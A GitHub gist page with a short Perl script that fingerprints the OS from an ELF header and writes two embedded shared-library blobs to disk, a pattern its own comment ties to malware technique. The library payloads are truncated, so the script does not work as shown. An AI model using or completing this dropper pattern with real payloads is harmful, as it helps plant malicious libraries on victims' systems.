Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
#!/usr/bin/perl
use Config;
$SO32="\x7f\x45\x4c\x46\x01\..x00";
$SO64="\x7f\x45\x4c\x46\x02\..x00";
# detect system - use as per malware code technique,a buggy unreliable method.
$name = "%helper";
open F, $name and binmode F and read (F, $buf, 8) and close F;
@b = unpack("C*", $buf);
$sys = $b[7];
print "System is ".($sys == 9 ? "FreeBSD" : "Linux")."\n";
# drop library x32
$so = $SO32;
open $F, ">./cong32.so";
print $F $so;
close $F;
print "Dropped library x32\n";
# drop library x64
$so = $SO64;
open $F, ">./cong64.so";
print $F $so;
close $F;
print "Dropped library x64\n";
exit 0;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment